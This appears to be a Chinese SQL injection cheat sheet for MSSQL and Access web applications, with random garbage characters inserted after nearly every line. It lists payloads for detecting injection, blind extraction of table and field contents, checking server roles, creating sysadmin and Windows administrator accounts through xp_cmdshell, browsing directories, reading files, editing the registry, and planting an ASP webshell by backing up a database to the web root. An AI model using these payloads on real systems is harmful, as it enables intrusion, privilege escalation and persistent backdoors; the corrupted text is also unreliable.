1.判断是否有注入;and 1=1 ;and 1=2 i���4>��M�
2.初步判断是否是mssql ;and user>0 %L�Ht�{:9.
njJTEU�d">
3.注入参数是字符'and [查询条件] and ''=' 7Cz=;��
d^~yU�k���
4.搜索时没过滤参数的'and [查询条件] and '%25'='
Rq2bj_�j
h*<`ct x�L
5.判断数据库系统 �.#tA �.%
`%Kj+^|�DS
;and (select count(*) from sysobjects)>0 mssql �5G2ueRVb�
<� <�0[�PJ
;and (select count(*) from msysobjects)>0 access >\'}&oi���
{%(�'|(�57
$�!p2Kf>/Q
@Kt�!uKrI
6.猜数据库 ;and (select Count(*) from [数据库名])>0 �3:$@DZT$�
%kkDitmI{�
7.猜字段 ;and (select Count(字段名) from 数据库名)>0 r&v!2�A]:�
U��. <�c#S
8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 �Hxac#(,7�
sng���6U;Z
9.(1)猜字段的ascii值(access) &09~ D8�f'
O:,�Gmft�+
;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ?G9DSk?6%Z
gL|
9hvHr[
(2)猜字段的ascii值(mssql) 0�1
+#2~S
"��.�A�W �
;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 V1nq�E�dhk
peS4<MqWu�
10.测试权限结构(mssql) I�
WT|dA >
Oel%l�Y}m3
_a$��5�"�
pox;��NdX7
;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- Wo9=c�YC)
w���D6QN�
;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- uJ1oo�| sn
�n�W�f8�r8
;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- 1:DA{e�jS�
4Rp[>}L���
;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ESIeZhX�VH
sy�(bL��_%
;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- d{�WO�O)�j
1�z,�P"?Q�
;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Um-Xb'R*]V
+�S�wl$a�b
;and 1=(select IS_MEMBER('db_owner'));-- 9}K
K]m6u}
�9w0v?�%%_
�&'i.W}Ib!
"�f3m��i�[
11.添加mssql和系统的帐户 f��@�Ve,�i
�h{~Gzr�L*
;exec master.dbo.sp_addlogin username;-- N��N:zQ_RT
;exec master.dbo.sp_password null,username,password;-- 2=�7[�r-*E
e�i�]Q<vT6
;exec master.dbo.sp_addsrvrolemember sysadmin username;-- VJr��~h
"[
\��:JY[s/�
;exec master.dbo.xp_cmdshell 'net user username password "�K|':3n|
Bbb"�:c6w0
/workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- voP�#}�f�D
���K�p;<z<
;exec master.dbo.xp_cmdshell 'net user username password /add';-- ND��e F��Y
97>|eDc �Y
;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- �XTb�.cqOC
>)>�~S��_u
a9 S�&n5��
JAwE�u79sh
12.(1)遍历目录 `i��~J�0#P
fgo3Gy*��#
;create table dirs(paths varchar(100), id int) CRzLyiRvU&
7D8 pb0`;J
;insert dirs exec master.dbo.xp_dirtree 'c:\' VqOTrB1w/
.v=�n-�k�7
;and (select top 1 paths from dirs)>0 �ZWB3����R
8_rd1�:t5
;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) jW| �,5,43
?^8�.Sa{�
JV2[jo}0�N
Mp��J3*$Dr
(2)遍历目录 E%f�!�S�D
�& �)�-fC�
;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- C}o^p"M*B3
;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 �b!��EqYT�
+&1#ob"6lq
;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 �-)ri,v{:c
'��]X0g�{%
;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 '�Z�e&�
LQ
�bg|=)s�w4
;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 6�iH]N*]S^
U��s>n`Lj@
�]h=����y�
5RSP�.Vyx{
13.mssql中的存储过程 ��`�;Fs��
�sY�}0�P�B
xp_regenumvalues 注册表根键, 子键 �dr�"@�2=Z
D_w<igu!3�
;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 `V[ �hE
r|
q^���[��SN
xp_regread 根键,子键,键值名 TH�wq~c�'�
PXDJ[Oj7(0
;exec xp_regread ,;=is.h�9
R�Ht~�:D3*
'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 BJZGQrs��z
eTtiAF=b�W
xp_regwrite 根键,子键, 值名, 值类型, 值 p|)j�{n��c
g���F~
��}
值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 0���}Q��d�
C*Y0GfW=��
;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 _oU~�S$�hO
�t�..@��69
xp_regdeletevalue 根键,子键,值名 Hh�T�D/���
��g�3(�?!f
exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 _�[hVGCS�B
!�ZN"(0#qz
xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 'sjks sy.3
3"6��-X�_�
BQ!_i*14+�
A�6Wtzt2i�
14.mssql的backup创建webshell 4?x$O{D5?{
p1\�E�C�#Q
use model bxww1NG>|Z
�).r�0�4)/
create table cmd(str image); g$Ns��u:L�
�;q2e[��y
insert into cmd(str) values (''); n{%[�G2.A
!wjD6���NK
backup database model to disk='c:\l.asp'; 8q�q'q"��g
G�Yri\�<[
�O~F8��l�Q
%e=U��YBj"
15.mssql内置函数 l]P3oB}Yo�
*3y:�Wv T>
;and (select @@version)>0 获得Windows的版本号 1Zfh�DtK(�
-s6;Io�G/
;and user_name()='dbo' 判断当前系统的连接用户是不是sa Snas:#B�!
�@0%^�\Qf2
;and (select user_name())>0 爆当前系统的连接用户 �TUR2|J�@n
2{-'`l�fM%
;and (select db_name())>0 得到当前连接的数据库 �y]%�Io]!d
)G$0:-J�-�
M7��A�UY#)
::�k/hP9.^
16.简洁的webshell ��s�HMZ'9b
myWa�>�Mvb
use model (w,�
Gv-S�
h4? 'd�+�K
create table cmd(str image); ;e���^`r;]
iD!�]I$���
insert into cmd(str) values (''); N1z:�9=(�I
Bf6\KI<�V2
backup database model to disk='g:\wwwtest\l.asp';
